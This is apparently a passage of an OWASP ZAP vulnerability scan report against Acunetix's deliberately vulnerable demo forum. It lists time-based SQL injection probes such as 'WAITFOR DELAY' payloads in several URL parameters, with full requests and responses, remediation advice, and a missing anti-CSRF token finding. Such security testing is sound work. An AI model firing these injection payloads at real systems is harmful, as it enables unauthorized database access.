<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
Instances | 1 |
Solution |
Do not trust client side input, even if there is client side validation in place.
In general, type check all data on the server side.
If the application uses JDBC, use PreparedStatement or CallableStatement, with parameters passed by '?'
If the application uses ASP, use ADO Command Objects with strong type checking and parameterized queries.
If database Stored Procedures can be used, use them.
Do *not* concatenate strings into queries in the stored procedure, or use 'exec', 'exec immediate', or equivalent functionality!
Do not create dynamic SQL queries using simple string concatenation.
Escape all data received from the client.
Apply an 'allow list' of allowed characters, or a 'deny list' of disallowed characters in user input.
Apply the privilege of least privilege by using the least privileged database user possible.
In particular, avoid using the 'sa' or 'db-owner' database users. This does not eliminate SQL injection, but minimizes its impact.
Grant the minimum database access that is necessary for the application.
|
Reference | https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html |
Tags |
OWASP_2021_A03
WSTG-v42-INPV-05 OWASP_2017_A01 |
CWE Id | 89 |
WASC Id | 19 |
Plugin Id | 40018 |
High |
SQL Injection - MsSQL |
---|---|
Description |
SQL injection may be possible
|
URL | http://testasp.vulnweb.com/Search.asp?tfSearch=YKSrENiG |
Method | GET |
Parameter | tfSearch |
Attack | YKSrENiG) ' WAITFOR DELAY '0:0:15' -- |
Evidence | |
Request Header - size: 520 bytes. |
GET http://testasp.vulnweb.com/Search.asp?tfSearch=YKSrENiG%29+%27+WAITFOR+DELAY+%270%3A0%3A15%27+--+ HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testasp.vulnweb.com/Search.asp Cookie: ASPSESSIONIDASSBRCRC=FCLMIJFALIPFLHBOMHKNEOFN Upgrade-Insecure-Requests: 1 |
Request Body - size: 0 bytes. |
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:11:22 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/showforum.asp?id=0 |
Method | GET |
Parameter | id |
Attack | 0 WAITFOR DELAY '0:0:15' -- |
Evidence | |
Request Header - size: 493 bytes. |
GET http://testasp.vulnweb.com/showforum.asp?id=0+WAITFOR+DELAY+%270%3A0%3A15%27+--+ HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testasp.vulnweb.com/ Cookie: ASPSESSIONIDASSBRCRC=FCLMIJFALIPFLHBOMHKNEOFN Upgrade-Insecure-Requests: 1 |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:11:22 GMT Content-Length: 3713 |
Response Body - size: 3,713 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Acunetix Web Vulnerability Scanner</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0%2BWAITFOR%2BDELAY%2B%25270%253A0%253A15%2527%2B%2D%2D%2B" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0%2BWAITFOR%2BDELAY%2B%25270%253A0%253A15%2527%2B%2D%2D%2B" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> Acunetix Web Vulnerability Scanner </div> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Thread</td> <td class="tableheader">Posts</td> <td class="tableheader">Posted by</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=0'>1</a></div></td><td>1</td><td>admin</td><td>11/9/2005 12:16:25 PM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=1'>2</a></div></td><td>1</td><td>admin</td><td>11/9/2005 12:16:28 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=2'>3</a></div></td><td>2</td><td>admin</td><td>11/9/2005 1:08:52 PM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=3'>aaa</a></div></td><td>1</td><td>admin</td><td>11/9/2005 1:45:54 PM</td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;left:10%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=0 |
Method | GET |
Parameter | id |
Attack | 0 WAITFOR DELAY '0:0:15' -- |
Evidence | |
Request Header - size: 512 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=0+WAITFOR+DELAY+%270%3A0%3A15%27+--+ HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=FCLMIJFALIPFLHBOMHKNEOFN Upgrade-Insecure-Requests: 1 |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:11:52 GMT Content-Length: 3403 |
Response Body - size: 3,403 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 1 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0%2BWAITFOR%2BDELAY%2B%25270%253A0%253A15%2527%2B%2D%2D%2B" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0%2BWAITFOR%2BDELAY%2B%25270%253A0%253A15%2527%2B%2D%2D%2B" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/1 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>admin</b> on 11/9/2005 12:16:25 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>1</div><div class='posttext'>1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>admin</b> on 11/9/2005 12:16:35 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>1</div><div class='posttext'>1</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=83 |
Method | POST |
Parameter | id |
Attack | 83 WAITFOR DELAY '0:0:15' -- |
Evidence | |
Request Header - size: 452 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=83+WAITFOR+DELAY+%270%3A0%3A15%27+--+ HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=83 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:09:49 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
Instances | 4 |
Solution |
Do not trust client side input, even if there is client side validation in place.
In general, type check all data on the server side.
If the application uses JDBC, use PreparedStatement or CallableStatement, with parameters passed by '?'
If the application uses ASP, use ADO Command Objects with strong type checking and parameterized queries.
If database Stored Procedures can be used, use them.
Do *not* concatenate strings into queries in the stored procedure, or use 'exec', 'exec immediate', or equivalent functionality!
Do not create dynamic SQL queries using simple string concatenation.
Escape all data received from the client.
Apply an 'allow list' of allowed characters, or a 'deny list' of disallowed characters in user input.
Apply the privilege of least privilege by using the least privileged database user possible.
In particular, avoid using the 'sa' or 'db-owner' database users. This does not eliminate SQL injection, but minimizes its impact.
Grant the minimum database access that is necessary for the application.
|
Reference | https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html |
Tags |
OWASP_2021_A03
WSTG-v42-INPV-05 OWASP_2017_A01 |
CWE Id | 89 |
WASC Id | 19 |
Plugin Id | 40027 |
Medium |
Absence of Anti-CSRF Tokens |
---|---|
Description |
No Anti-CSRF tokens were found in a HTML submission form.
A cross-site request forgery is an attack that involves forcing a victim to send an HTTP request to a target destination without their knowledge or intent in order to perform an action as the victim. The underlying cause is application functionality using predictable URL/form actions in a repeatable way. The nature of the attack is that CSRF exploits the trust that a web site has for a user. By contrast, cross-site scripting (XSS) exploits the trust that a user has for a web site. Like XSS, CSRF attacks are not necessarily cross-site, but they can be. Cross-site request forgery is also known as CSRF, XSRF, one-click attack, session riding, confused deputy, and sea surf.
CSRF attacks are effective in a number of situations, including:
* The victim has an active session on the target site.
* The victim is authenticated via HTTP auth on the target site.
* The victim is on the same local network as the target site.
CSRF has primarily been used to perform an action against a target site using the victim's privileges, but recent techniques have been discovered to disclose information by gaining access to the response. The risk of information disclosure is dramatically increased when the target site is vulnerable to XSS, because XSS can be used as a platform for CSRF, allowing the attack to operate within the bounds of the same-origin policy.
|
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2FDefault%2Easp%3F |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="POST"> |
Request Header - size: 342 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2FDefault%2Easp%3F HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:38 GMT Content-Length: 3198 |
Response Body - size: 3,198 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FDefault%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FDefault%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3F |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="POST"> |
Request Header - size: 352 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3F HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Search.asp Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:39 GMT Content-Length: 3196 |
Response Body - size: 3,196 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FSearch%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FSearch%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DYKSrENiG |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="POST"> |
Request Header - size: 522 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DYKSrENiG HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testasp.vulnweb.com/Search.asp?tfSearch=YKSrENiG Cookie: ASPSESSIONIDASSBRCRC=FCLMIJFALIPFLHBOMHKNEOFN Upgrade-Insecure-Requests: 1 |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:01:12 GMT Content-Length: 3234 |
Response Body - size: 3,234 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DYKSrENiG" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DYKSrENiG" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="POST"> |
Request Header - size: 379 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Search.asp?tfSearch=ZAP Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:46 GMT Content-Length: 3137 |
Response Body - size: 3,137 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div 